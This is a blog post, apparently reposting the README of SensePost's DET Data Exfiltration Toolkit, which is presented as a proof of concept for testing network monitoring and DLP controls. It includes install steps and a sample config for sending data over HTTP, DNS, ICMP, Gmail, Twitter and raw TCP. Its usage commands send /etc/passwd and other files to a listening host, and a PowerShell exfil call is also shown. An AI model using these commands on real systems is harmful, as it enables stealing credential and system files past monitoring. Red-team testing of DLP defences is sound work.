Data Exfiltration Toolkit (DET)

by do son · Published February 13, 2019 · Updated November 4, 2024

DET (extensible) Data Exfiltration Toolkit

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channels(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service. The idea was to create a generic toolkit to plug any kind of protocol/service to test implemented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.

Data Exfiltration Toolkit

DET supports multiple protocols, listed here:

HTTP(S)
ICMP
DNS
SMTP/IMAP (eg. Gmail)
Raw TCP
PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other “services”:

Google Docs (Unauthenticated)
Twitter (Direct Messages)

Install

git clone https://github.com/sensepost/DET.git
cd DET
pip install -r requirements.txt –user

Configuration

In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json

{

    "plugins": {

        "http": {

            "target": "192.168.1.101",

            "port": 8080

        },

        "google_docs": {

            "target": "192.168.1.101",

            "port": 8080,

        },

        "dns": {

            "key": "google.com",

            "target": "192.168.1.101",

            "port": 53

        },

        "gmail": {

            "username": "dataexfil@gmail.com",

            "password": "ReallyStrongPassword",

            "server": "smtp.gmail.com",

            "port": 587

        },

        "tcp": {

            "target": "192.168.1.101",

            "port": 6969

        },

        "udp": {

            "target": "192.168.1.101",

            "port": 6969

        },

        "twitter": {

            "username": "PaulWebSec",

            "CONSUMER_TOKEN": "XXXXXXXXX",

            "CONSUMER_SECRET": "XXXXXXXXX",

            "ACCESS_TOKEN": "XXXXXXXXX",

            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"

        },

        "icmp": {

            "target": "192.168.1.101"

        }

    },

    "AES_KEY": "THISISACRAZYKEY",

    "sleep_time": 10

}

Usage

python det.py -h

usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]

              [-L]



Data Exfiltration Toolkit (SensePost)



optional arguments:

  -h, --help  show this help message and exit

  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')

  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')

  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')

  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')

  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')

  -L          Server mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and Gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and Gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP–exfil ‘C:\path\to\file.exe’

Source: https://github.com/PaulSec/